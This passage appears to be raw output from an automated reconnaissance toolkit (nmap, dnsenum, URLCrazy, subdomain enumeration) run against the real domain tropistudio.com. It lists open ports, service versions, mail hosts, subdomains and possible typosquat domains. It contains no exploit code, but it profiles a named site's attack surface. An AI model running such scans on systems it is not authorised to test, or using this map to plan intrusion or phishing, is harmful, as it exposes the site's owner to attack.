1144 Script Info: | Not valid before: 2019-05-03T09:49:26
1145 Script Info: | Not valid after: 2046-09-17T09:49:26
1146 Script Info: | MD5: 5e1b 76dc 7348 aee1 38f7 2272 1ea7 6cfe
1147 Script Info: |_SHA-1: 8d35 b1fb 5d2f 9ae3 0d01 a319 f323 03fd c6b1 3573
1148 Port: 25/tcp open smtp syn-ack ttl 43 Exim smtpd 4.92
1149 Script Info: | smtp-commands: server98222.domain.local Hello nmap.scanme.org [45.132.192.65], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
1150 Script Info: |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
1151 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1152 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1153 Script Info: | Public Key type: rsa
1154 Script Info: | Public Key bits: 4096
1155 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1156 Script Info: | Not valid before: 2016-05-13T00:34:32
1157 Script Info: | Not valid after: 2043-09-28T00:34:32
1158 Script Info: | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1159 Script Info: |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1160 Script Info: |_ssl-date: 2020-02-29T07:03:25+00:00; -4m17s from scanner time.
1161 Port: 53/tcp open domain syn-ack ttl 42 ISC BIND 9.8.2rc1 (RedHat Enterprise Linux 6)
1162 Script Info: | dns-nsid:
1163 Script Info: |_ bind.version: 9.8.2rc1-RedHat-9.8.2-0.68.rc1.el6_10.1
1164 Port: 80/tcp open ssl/http syn-ack ttl 42 Apache/2
1165 Script Info: | http-methods:
1166 Script Info: |_ Supported Methods: HEAD GET POST OPTIONS
1167 Script Info: |_http-server-header: Apache/2
1168 Script Info: |_http-title: Site doesn't have a title (text/html).
1169 Port: 110/tcp open pop3 syn-ack ttl 43 Dovecot DirectAdmin pop3d
1170 Script Info: |_pop3-capabilities: AUTH-RESP-CODE UIDL TOP PIPELINING USER SASL(PLAIN) STLS RESP-CODES CAPA
1171 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1172 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1173 Script Info: | Public Key type: rsa
1174 Script Info: | Public Key bits: 4096
1175 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1176 Script Info: | Not valid before: 2016-05-13T00:34:32
1177 Script Info: | Not valid after: 2043-09-28T00:34:32
1178 Script Info: | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1179 Script Info: |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1180 Script Info: |_ssl-date: 2020-02-29T07:03:25+00:00; -4m17s from scanner time.
1181 Port: 111/tcp open rpcbind syn-ack ttl 43 2-4 (RPC #100000)
1182 Script Info: | rpcinfo:
1183 Script Info: | program version port/proto service
1184 Script Info: | 100000 2,3,4 111/tcp rpcbind
1185 Script Info: | 100000 2,3,4 111/udp rpcbind
1186 Script Info: | 100000 3,4 111/tcp6 rpcbind
1187 Script Info: | 100000 3,4 111/udp6 rpcbind
1188 Script Info: | 100024 1 35598/tcp status
1189 Script Info: | 100024 1 43746/tcp6 status
1190 Script Info: | 100024 1 48690/udp6 status
1191 Script Info: |_ 100024 1 56252/udp status
1192 Port: 143/tcp open imap syn-ack ttl 42 Dovecot imapd
1193 Script Info: |_imap-capabilities: SASL-IR more ID LOGIN-REFERRALS STARTTLS post-login LITERAL+ OK IMAP4rev1 Pre-login AUTH=PLAINA0001 listed ENABLE capabilities IDLE have
1194 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1195 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1196 Script Info: | Public Key type: rsa
1197 Script Info: | Public Key bits: 4096
1198 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1199 Script Info: | Not valid before: 2016-05-13T00:34:32
1200 Script Info: | Not valid after: 2043-09-28T00:34:32
1201 Script Info: | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1202 Script Info: |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1203 Script Info: |_ssl-date: 2020-02-29T07:03:25+00:00; -4m18s from scanner time.
1204 Port: 443/tcp open ssl/ssl syn-ack ttl 43 Apache httpd (SSL-only mode)
1205 Script Info: | http-methods:
1206 Script Info: |_ Supported Methods: GET HEAD POST
1207 Script Info: |_http-server-header: Apache/2
1208 Script Info: |_http-title: 400 Bad Request
1209 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
1210 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=US
1211 Script Info: | Public Key type: rsa
1212 Script Info: | Public Key bits: 2048
1213 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1214 Script Info: | Not valid before: 2019-05-03T09:49:26
1215 Script Info: | Not valid after: 2046-09-17T09:49:26
1216 Script Info: | MD5: 5e1b 76dc 7348 aee1 38f7 2272 1ea7 6cfe
1217 Script Info: |_SHA-1: 8d35 b1fb 5d2f 9ae3 0d01 a319 f323 03fd c6b1 3573
1218 Script Info: |_ssl-date: 2020-02-29T07:03:23+00:00; -4m17s from scanner time.
1219 Port: 465/tcp open ssl/smtp syn-ack ttl 43 Exim smtpd 4.92
1220 Script Info: |_smtp-commands: Couldn't establish connection on port 465
1221 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1222 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1223 Script Info: | Public Key type: rsa
1224 Script Info: | Public Key bits: 4096
1225 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1226 Script Info: | Not valid before: 2016-05-13T00:34:32
1227 Script Info: | Not valid after: 2043-09-28T00:34:32
1228 Script Info: | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1229 Script Info: |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1230 Script Info: |_ssl-date: 2020-02-29T07:03:23+00:00; -4m17s from scanner time.
1231 Port: 587/tcp open smtp syn-ack ttl 42 Exim smtpd 4.92
1232 Script Info: | smtp-commands: server98222.domain.local Hello nmap.scanme.org [45.132.192.65], SIZE 52428800, 8BITMIME, PIPELINING, AUTH PLAIN LOGIN, STARTTLS, HELP,
1233 Script Info: |_ Commands supported: AUTH STARTTLS HELO EHLO MAIL RCPT DATA BDAT NOOP QUIT RSET HELP
1234 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1235 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1236 Script Info: | Public Key type: rsa
1237 Script Info: | Public Key bits: 4096
1238 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1239 Script Info: | Not valid before: 2016-05-13T00:34:32
1240 Script Info: | Not valid after: 2043-09-28T00:34:32
1241 Script Info: | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1242 Script Info: |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1243 Script Info: |_ssl-date: 2020-02-29T07:03:25+00:00; -4m18s from scanner time.
1244 Port: 993/tcp open ssl/imap syn-ack ttl 42
1245 Script Info: | fingerprint-strings:
1246 Script Info: | GenericLines:
1247 Script Info: | * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot DA ready.
1248 Script Info: | Error in IMAP command received by server.
1249 Script Info: | Error in IMAP command received by server.
1250 Script Info: | NULL:
1251 Script Info: |_ * OK [CAPABILITY IMAP4rev1 SASL-IR LOGIN-REFERRALS ID ENABLE IDLE LITERAL+ AUTH=PLAIN] Dovecot DA ready.
1252 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1253 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1254 Script Info: | Public Key type: rsa
1255 Script Info: | Public Key bits: 4096
1256 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1257 Script Info: | Not valid before: 2016-05-13T00:34:32
1258 Script Info: | Not valid after: 2043-09-28T00:34:32
1259 Script Info: | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1260 Script Info: |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1261 Script Info: |_ssl-date: 2020-02-29T07:03:23+00:00; -4m17s from scanner time.
1262 Port: 995/tcp open ssl/pop3 syn-ack ttl 42 Dovecot DirectAdmin pop3d
1263 Script Info: | ssl-cert: Subject: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1264 Script Info: | Issuer: commonName=localhost/organizationName=none/stateOrProvinceName=Someprovince/countryName=GB
1265 Script Info: | Public Key type: rsa
1266 Script Info: | Public Key bits: 4096
1267 Script Info: | Signature Algorithm: sha1WithRSAEncryption
1268 Script Info: | Not valid before: 2016-05-13T00:34:32
1269 Script Info: | Not valid after: 2043-09-28T00:34:32
1270 Script Info: | MD5: 4131 e074 fdcd 27ab dcd4 6c9d 6dff 1582
1271 Script Info: |_SHA-1: f7b5 61d5 0e95 b265 0bad 9da6 2a0e 7f26 3924 749c
1272 Script Info: |_ssl-date: 2020-02-29T07:03:24+00:00; -4m17s from scanner time.
1273 Port: 3306/tcp open mysql syn-ack ttl 42 MySQL (unauthorized)
1274 Os Info: Host: server98222.domain.local; OS: Linux; CPE: cpe:/o:redhat:enterprise_linux:6
1275 IP: 68.178.213.203
1276 HostName: smtp.secureserver.net Type: MX
1277 HostName: p3plibsmtp03-v01.prod.phx3.secureserver.net Type: PTR
1278 Country: United States
1279 Is Active: True (syn-ack ttl 43)
1280 IP: 72.167.238.32
1281 HostName: mailstore1.secureserver.net Type: MX
1282 HostName: p3pismtp01-065.prod.phx3.secureserver.net Type: PTR
1283 Country: United States
1284 Is Active: True (syn-ack ttl 43)
1285 IP: 68.178.213.243
1286 HostName: mailstore1.secureserver.net Type: MX
1287 HostName: ip-68-178-213-243.ip.secureserver.net Type: PTR
1288 Country: United States
1289 Is Active: True (echo-reply ttl 42)
1290 Port: 25/tcp open smtp? syn-ack ttl 43
1291 Script Info: | fingerprint-strings:
1292 Script Info: | DNSStatusRequestTCP:
1293 Script Info: | 421 p3plibsmtp02-14.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1294 Script Info: | DNSVersionBindReqTCP:
1295 Script Info: | 421 p3plibsmtp02-15.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1296 Script Info: | GenericLines, GetRequest, HTTPOptions, Help:
1297 Script Info: | 421 p3plibsmtp02-02.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1298 Script Info: | Hello:
1299 Script Info: | 421 p3plibsmtp02-01.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1300 Script Info: | NULL, RPCCheck, RTSPRequest:
1301 Script Info: |_ 421 p3plibsmtp02-08.prod.phx3.secureserver.net CMGW Temporarily rejected. Reverse DNS for 45.132.192.65 failed. IB108 <http://x.co/srbounce>
1302 Script Info: |_smtp-commands: SMTP EHLO nmap.scanme.org: failed to receive data: connection closed
1303
1304--------------End Summary --------------
1305-----------------------------------------
1306#########################################################################################################################
1307----- tropistudio.com -----
1308
1309
1310Host's addresses:
1311__________________
1312
1313tropistudio.com. 491 IN A 111.90.145.39
1314
1315
1316Name Servers:
1317______________
1318
1319ns12.domaincontrol.com. 33174 IN A 173.201.73.6
1320ns11.domaincontrol.com. 19265 IN A 97.74.105.6
1321
1322
1323Mail (MX) Servers:
1324___________________
1325
1326mailstore1.secureserver.net. 60 IN A 68.178.213.244
1327mailstore1.secureserver.net. 60 IN A 68.178.213.243
1328mailstore1.secureserver.net. 60 IN A 72.167.238.32
1329smtp.secureserver.net. 21 IN A 68.178.213.203
1330smtp.secureserver.net. 21 IN A 68.178.213.37
1331smtp.secureserver.net. 21 IN A 72.167.238.29
1332
1333
1334Trying Zone Transfers and getting Bind Versions:
1335_________________________________________________
1336
1337
1338Trying Zone Transfer for tropistudio.com on ns12.domaincontrol.com ...
1339AXFR record query failed: corrupt packet
1340
1341Trying Zone Transfer for tropistudio.com on ns11.domaincontrol.com ...
1342AXFR record query failed: corrupt packet
1343
1344
1345Scraping tropistudio.com subdomains from Google:
1346_________________________________________________
1347
1348
1349 ---- Google search page: 1 ----
1350
1351
1352 ---- Google search page: 2 ----
1353
1354
1355
1356Google Results:
1357________________
1358
1359 perhaps Google is blocking our queries.
1360 Check manually.
1361
1362
1363Brute forcing with /usr/share/dnsenum/dns.txt:
1364_______________________________________________
1365
1366www.tropistudio.com. 3486 IN CNAME tropistudio.com.
1367tropistudio.com. 486 IN A 111.90.145.39
1368
1369
1370Launching Whois Queries:
1371_________________________
1372
1373 whois ip result: 111.90.145.0 -> 111.90.128.0/19
1374
1375
1376tropistudio.com_______________
1377
1378 111.90.128.0/19
1379########################################################################################################################
1380
1381dnsenum VERSION:1.2.6
1382
1383----- tropistudio.com -----
1384
1385
1386Host's addresses:
1387__________________
1388
1389tropistudio.com. 598 IN A 111.90.145.39
1390
1391
1392Name Servers:
1393______________
1394
1395ns12.domaincontrol.com. 43200 IN A 173.201.73.6
1396ns11.domaincontrol.com. 26497 IN A 97.74.105.6
1397
1398
1399Mail (MX) Servers:
1400___________________
1401
1402smtp.secureserver.net. 60 IN A 68.178.213.37
1403smtp.secureserver.net. 60 IN A 68.178.213.203
1404smtp.secureserver.net. 60 IN A 72.167.238.29
1405mailstore1.secureserver.net. 60 IN A 68.178.213.243
1406mailstore1.secureserver.net. 60 IN A 68.178.213.244
1407mailstore1.secureserver.net. 60 IN A 72.167.238.32
1408
1409
1410Trying Zone Transfers and getting Bind Versions:
1411_________________________________________________
1412
1413
1414Trying Zone Transfer for tropistudio.com on ns12.domaincontrol.com ...
1415
1416Trying Zone Transfer for tropistudio.com on ns11.domaincontrol.com ...
1417
1418
1419Brute forcing with /usr/share/sniper/wordlists/vhosts.txt:
1420___________________________________________________________
1421
1422www.tropistudio.com. 3600 IN CNAME tropistudio.com.
1423tropistudio.com. 600 IN A 111.90.145.39
1424
1425
1426tropistudio.com class C netranges:
1427___________________________________
1428
1429 111.90.145.0/24
1430
1431
1432tropistudio.com ip blocks:
1433___________________________
1434
1435 111.90.145.39/32
1436
1437done.
1438########################################################################################################################
1439URLCrazy Domain Report
1440Domain : tropistudio.com
1441Keyboard : qwerty
1442At : 2020-02-29 01:54:00 -0500
1443
1444# Please wait. 157 hostnames to process
1445
1446Typo Type Typo DNS-A CC-A DNS-MX Extn
1447------------------------------------------------------------------------------------------------------------------
1448Character Omission topistudio.com ? com
1449Character Omission troistudio.com 136.144.199.124 US,UNITED STATES mailstore1.secureserver.net com
1450Character Omission tropistdio.com ? com
1451Character Omission tropistudi.com ? com
1452Character Omission tropistudio.cm ? cm
1453Character Omission tropistudo.com ? com
1454Character Omission tropistuio.com ? com
1455Character Omission tropisudio.com ? com
1456Character Omission tropitudio.com ? com
1457Character Omission tropstudio.com 185.53.178.7 mail.h-email.net com
1458Character Omission trpistudio.com ? com
1459Character Repeat troopistudio.com ? com
1460Character Repeat tropiistudio.com ? com
1461Character Repeat tropisstudio.com ? com
1462Character Repeat tropisttudio.com ? com
1463Character Repeat tropistuddio.com ? com
1464Character Repeat tropistudiio.com ? com
1465Character Repeat tropistudioo.com ? com
1466Character Repeat tropistuudio.com ? com
1467Character Repeat troppistudio.com ? com
1468Character Repeat trropistudio.com ? com
1469Character Repeat ttropistudio.com ? com
1470Character Swap rtopistudio.com ? com
1471Character Swap torpistudio.com ? com
1472Character Swap troipstudio.com ? com
1473Character Swap tropistduio.com ? com
1474Character Swap tropistudoi.com ? com
1475Character Swap tropistuido.com ? com
1476Character Swap tropisutdio.com ? com
1477Character Swap tropitsudio.com ? com
1478Character Swap tropsitudio.com ? com
1479Character Swap trpoistudio.com ? com
1480Character Replacement rropistudio.com ? com
1481Character Replacement teopistudio.com ? com
1482Character Replacement tripistudio.com ? com
1483Character Replacement trooistudio.com ? com
1484Character Replacement tropiatudio.com ? com
1485Character Replacement tropidtudio.com ? com
1486Character Replacement tropisrudio.com ? com
1487Character Replacement tropistidio.com ? com
1488Character Replacement tropistudii.com ? com
1489Character Replacement tropistudip.com ? com
1490Character Replacement tropistudoo.com ? com
1491Character Replacement tropistuduo.com ? com
1492Character Replacement tropistufio.com ? com
1493Character Replacement tropistusio.com ? com
1494Character Replacement tropistydio.com ? com
1495Character Replacement tropisyudio.com ? com
1496Character Replacement tropostudio.com ? com
1497Character Replacement tropustudio.com ? com
1498Character Replacement trppistudio.com ? com
1499Character Replacement ttopistudio.com ? com
1500Character Replacement yropistudio.com ? com
1501Character Insertion treopistudio.com ? com
1502Character Insertion troipistudio.com ? com
1503Character Insertion tropiostudio.com ? com
1504Character Insertion tropisatudio.com ? com
1505Character Insertion tropisdtudio.com ? com
1506Character Insertion tropistrudio.com ? com
1507Character Insertion tropistudfio.com ? com
1508Character Insertion tropistudioi.com ? com
1509Character Insertion tropistudiop.com ? com
1510Character Insertion tropistudiuo.com ? com
1511Character Insertion tropistudsio.com ? com
1512Character Insertion tropistuidio.com ? com
1513Character Insertion tropistuydio.com ? com
1514Character Insertion tropistyudio.com ? com
1515Character Insertion tropiustudio.com ? com
1516Character Insertion tropoistudio.com ? com
1517Character Insertion trtopistudio.com ? com
1518Character Insertion tyropistudio.com ? com
1519Missing Dot tropistudiocom.com ? com
1520Missing Dot wwwtropistudio.com ? com
1521Singular or Pluralise tropistudios.com ? com
1522Vowel Swap tropastudao.com ? com
1523Vowel Swap tropestudeo.com ? com
1524Vowel Swap tropistadio.com ? com
1525Vowel Swap tropistedio.com ? com
1526Vowel Swap tropistodio.com ? com
1527Vowel Swap tropostudoo.com ? com
1528Vowel Swap tropustuduo.com ? com
1529Homophones tropayestudayeo.com ? com
1530Homophones tropeyestudeyeo.com ? com
1531Homophones tropiestudio.com ? com
1532Bit Flipping 4ropistudio.com ? com
1533Bit Flipping dropistudio.com ? com
1534Bit Flipping propistudio.com ? com
1535Bit Flipping t2opistudio.com ? com
1536Bit Flipping tbopistudio.com ? com
1537Bit Flipping tpopistudio.com ? com
1538Bit Flipping trgpistudio.com ? com
1539Bit Flipping trkpistudio.com ? com
1540Bit Flipping trmpistudio.com ? com
1541Bit Flipping trnpistudio.com ? com
1542Bit Flipping tro0istudio.com ? com
1543Bit Flipping tropastudio.com ? com
1544Bit Flipping trophstudio.com ? com
1545Bit Flipping tropi3tudio.com ? com
1546Bit Flipping tropictudio.com ? com
1547Bit Flipping tropiqtudio.com ? com
1548Bit Flipping tropirtudio.com ? com
1549Bit Flipping tropis4udio.com ? com
1550Bit Flipping tropisdudio.com ? com
1551Bit Flipping tropispudio.com ? com
1552Bit Flipping tropist5dio.com ? com
1553Bit Flipping tropistqdio.com ? com
1554Bit Flipping tropisttdio.com ? com
1555Bit Flipping tropistudao.com ? com
1556Bit Flipping tropistudho.com ? com
1557Bit Flipping tropistudig.com ? com
1558Bit Flipping tropistudik.com ? com
1559Bit Flipping tropistudim.com ? com
1560Bit Flipping tropistudin.com ? com
1561Bit Flipping tropistudko.com ? com
1562Bit Flipping tropistudmo.com ? com
1563Bit Flipping tropistudyo.com ? com
1564Bit Flipping tropistueio.com ? com
1565Bit Flipping tropistulio.com ? com
1566Bit Flipping tropistutio.com ? com
1567Bit Flipping tropistwdio.com ? com
1568Bit Flipping tropisuudio.com ? com
1569Bit Flipping tropisvudio.com ? com
1570Bit Flipping tropiwtudio.com ? com
1571Bit Flipping tropkstudio.com ? com
1572Bit Flipping tropmstudio.com ? com
1573Bit Flipping tropystudio.com ? com
1574Bit Flipping troqistudio.com ? com
1575Bit Flipping troristudio.com ? com
1576Bit Flipping trotistudio.com ? com
1577Bit Flipping troxistudio.com ? com
1578Bit Flipping tsopistudio.com ? com
1579Bit Flipping tvopistudio.com ? com
1580Bit Flipping tzopistudio.com ? com
1581Bit Flipping uropistudio.com ? com
1582Bit Flipping vropistudio.com ? com
1583Homoglyphs tr0pistudi0.com ? com
1584Homoglyphs tr0pistudio.com ? com
1585Homoglyphs tropistuclio.com ? com
1586Homoglyphs tropistudi0.com ? com
1587Homoglyphs tropistudlo.com ? com
1588Homoglyphs troplstudio.com ? com
1589Homoglyphs troplstudlo.com ? com
1590Wrong TLD tropistudio.ca ? ca
1591Wrong TLD tropistudio.ch ? ch
1592Wrong TLD tropistudio.de ? de
1593Wrong TLD tropistudio.edu ? edu
1594Wrong TLD tropistudio.es ? es
1595Wrong TLD tropistudio.fr ? fr
1596Wrong TLD tropistudio.it ? it
1597Wrong TLD tropistudio.jp ? jp
1598Wrong TLD tropistudio.net ? net
1599Wrong TLD tropistudio.nl ? nl
1600Wrong TLD tropistudio.no ? no
1601Wrong TLD tropistudio.org ? org
1602Wrong TLD tropistudio.ru ? ru
1603Wrong TLD tropistudio.se ? se
1604Wrong TLD tropistudio.us ? us
1605########################################################################################################################
1606ThreatCrowd: www.tropistudio.com
1607Virustotal: www.tropistudio.com
1608Virustotal: mail.tropistudio.com
1609Virustotal: webmail.tropistudio.com
1610[-] Saving results to file: /usr/share/sniper/loot/workspace/tropistudio.com/domains/domains-tropistudio.com.txt
1611[-] Total Unique Subdomains Found: 6
1612www.tropistudio.com
1613autodiscover.tropistudio.com
1614cpanel.tropistudio.com
1615mail.tropistudio.com
1616webdisk.tropistudio.com
1617webmail.tropistudio.com
1618########################################################################################################################
1619[*] Processing domain tropistudio.com
1620[*] Using system resolvers ['10.101.0.243', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
1621[+] Getting nameservers
1622173.201.73.6 - ns12.domaincontrol.com
162397.74.105.6 - ns11.domaincontrol.com
1624[-] Zone transfer failed
1625
1626[+] MX records found, added to target list
162710 smtp.secureserver.net.
16280 mailstore1.secureserver.net.
1629
1630[*] Scanning tropistudio.com for A records
1631111.90.145.39 - tropistudio.com
163268.178.252.5 - email.tropistudio.com
163345.40.130.41 - email.tropistudio.com
163468.178.252.148 - email.tropistudio.com
1635173.201.193.133 - email.tropistudio.com
163697.74.135.148 - email.tropistudio.com
163797.74.135.45 - email.tropistudio.com
1638173.201.193.148 - email.tropistudio.com
1639173.201.192.148 - email.tropistudio.com
1640173.201.193.5 - email.tropistudio.com
164197.74.135.133 - email.tropistudio.com
164272.167.218.45 - email.tropistudio.com
1643173.201.192.5 - email.tropistudio.com
164472.167.218.55 - email.tropistudio.com
1645173.201.192.133 - email.tropistudio.com
164672.167.218.183 - email.tropistudio.com
1647173.201.192.20 - email.tropistudio.com
164897.74.135.55 - email.tropistudio.com
164972.167.218.173 - email.tropistudio.com
165068.178.252.133 - email.tropistudio.com
165145.40.140.6 - email.tropistudio.com
1652173.201.193.20 - email.tropistudio.com
165345.40.130.40 - email.tropistudio.com
165468.178.252.20 - email.tropistudio.com
1655111.90.145.39 - www.tropistudio.com
1656
1657########################################################################################################################
1658
1659autodiscover.tropistudio.com
1660cpanel.tropistudio.com
1661mail.tropistudio.com
1662tropistudio.com
1663webdisk.tropistudio.com
1664webmail.tropistudio.com
1665www.tropistudio.com
1666
1667[+] Domains saved to: /usr/share/sniper/loot/workspace/tropistudio.com/domains/domains-tropistudio.com-crt.txt
1668######################################################################################################################
1669
1670mail.tropistudio.com
1671smtp.tropistudio.com
1672pop.tropistudio.com
1673mail.tropistudio.com
1674smtp.tropistudio.com
1675pop.tropistudio.com
1676
1677[+] Domains saved to: /usr/share/sniper/loot/workspace/tropistudio.com/domains/domains-tropistudio.com-spyse.txt
1678##########################################################################################################################
1679www.tropistudio.com
1680www.tropistudio.com
1681autodiscover.tropistudio.com
1682cpanel.tropistudio.com
1683mail.tropistudio.com
1684webdisk.tropistudio.com
1685webmail.tropistudio.com
1686domain
1687email.tropistudio.com
1688tropistudio.com
1689www.tropistudio.com
1690########################################################################################################################
1691WARNING: Duplicate port number(s) specified. Are you alert enough to be using Nmap? Have some coffee or Jolt(tm).
1692Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:03 EST
1693Nmap scan report for tropistudio.com (111.90.145.39)
1694Host is up (0.50s latency).
1695rDNS record for 111.90.145.39: web16.support-emilid.com
1696Not shown: 478 closed ports, 4 filtered ports
1697Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
1698PORT STATE SERVICE
169921/tcp open ftp
170025/tcp open smtp
170153/tcp open domain
170280/tcp open http
1703110/tcp open pop3
1704111/tcp open rpcbind
1705143/tcp open imap
1706443/tcp open https
1707465/tcp open smtps
1708587/tcp open submission
1709993/tcp open imaps
1710995/tcp open pop3s
17112222/tcp open EtherNetIP-1
17123306/tcp open mysql
1713
1714Nmap done: 1 IP address (1 host up) scanned in 5.25 seconds
1715########################################################################################################################
1716Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:03 EST
1717Nmap scan report for tropistudio.com (111.90.145.39)
1718Host is up (0.48s latency).
1719rDNS record for 111.90.145.39: web16.support-emilid.com
1720Not shown: 11 closed ports
1721PORT STATE SERVICE
172253/udp open|filtered domain
1723137/udp open|filtered netbios-ns
1724138/udp open|filtered netbios-dgm
1725389/udp open|filtered ldap
1726
1727Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds
1728########################################################################################################################
1729Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-29 02:03 EST
1730NSE: Loaded 54 scripts for scanning.
1731NSE: Script Pre-scanning.
1732Initiating NSE at 02:03
1733Completed NSE at 02:03, 0.00s elapsed
1734Initiating NSE at 02:03
1735Completed NSE at 02:03, 0.00s elapsed
1736Initiating Parallel DNS resolution of 1 host. at 02:03
1737Completed Parallel DNS resolution of 1 host. at 02:03, 0.02s elapsed
1738Initiating SYN Stealth Scan at 02:03
1739Scanning tropistudio.com (111.90.145.39) [1 port]
1740Discovered open port 21/tcp on 111.90.145.39
1741Completed SYN Stealth Scan at 02:03, 0.52s elapsed (1 total ports)
1742Initiating Service scan at 02:03
1743Scanning 1 service on tropistudio.com (111.90.145.39)
1744Completed Service scan at 02:03, 0.97s elapsed (1 service on 1 host)
1745Initiating OS detection (try #1) against tropistudio.com (111.90.145.39)
1746Retrying OS detection (try #2) against tropistudio.com (111.90.145.39)
1747Initiating Traceroute at 02:03
1748Completed Traceroute at 02:04, 3.76s elapsed
1749Initiating Parallel DNS resolution of 22 hosts. at 02:04
1750Completed Parallel DNS resolution of 22 hosts. at 02:04, 2.54s elapsed
1751NSE: Script scanning 111.90.145.39.
1752Initiating NSE at 02:04
1753Completed NSE at 02:05, 90.41s elapsed
1754Initiating NSE at 02:05
1755Completed NSE at 02:05, 0.05s elapsed
1756Nmap scan report for tropistudio.com (111.90.145.39)
1757Host is up (0.48s latency).
1758rDNS record for 111.90.145.39: web16.support-emilid.com
1759
1760PORT STATE SERVICE VERSION
176121/tcp open ftp Pure-FTPd
1762Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
1763Aggressive OS guesses: Linux 2.6.32 (95%), Linux 3.5 (95%), Linux 3.8 (95%), Linux 2.6.32 - 3.10 (95%), Linux 2.6.32 - 3.13 (95%), Linux 2.6.32 - 3.9 (95%), Linux 3.2 (95%), Linux 2.6.32 - 3.1 (94%), Linux 3.11 (94%), Linux 3.1 (94%)
1764No exact OS matches for host (test conditions non-ideal).
1765Uptime guess: 9.896 days (since Wed Feb 19 04:35:37 2020)
1766Network Distance: 25 hops
1767TCP Sequence Prediction: Difficulty=258 (Good luck!)
1768IP ID Sequence Generation: All zeros
1769
1770TRACEROUTE (using port 21/tcp)
1771HOP RTT ADDRESS
17721 129.29 ms 10.203.15.1
17732 ...
17743 130.12 ms te0-0-2-1.nr11.b069785-0.tll01.atlas.cogentco.com (149.6.188.49)
17754 130.77 ms be2160.rcr51.tll01.atlas.cogentco.com (154.25.10.249)
17765 136.07 ms be3741.ccr22.sto03.atlas.cogentco.com (154.54.60.194)
17776 155.07 ms be2282.ccr42.ham01.atlas.cogentco.com (154.54.72.105)
17787 160.30 ms be2815.ccr41.ams03.atlas.cogentco.com (154.54.38.205)
17798 249.99 ms be12194.ccr41.lon13.atlas.cogentco.com (154.54.56.93)
17809 249.04 ms be12497.ccr41.par01.atlas.cogentco.com (154.54.56.130)
178110 246.48 ms be3627.ccr41.jfk02.atlas.cogentco.com (66.28.4.197)
178211 250.05 ms be2806.ccr41.dca01.atlas.cogentco.com (154.54.40.106)
178312 263.24 ms be2112.ccr41.atl01.atlas.cogentco.com (154.54.7.158)
178413 276.30 ms be2687.ccr41.iah01.atlas.cogentco.com (154.54.28.70)
178514 292.08 ms be2927.ccr21.elp01.atlas.cogentco.com (154.54.29.222)
178615 300.83 ms be2928.ccr21.elp01.atlas.cogentco.com (154.54.30.162)
178716 315.28 ms be2932.ccr42.lax01.atlas.cogentco.com (154.54.45.162)
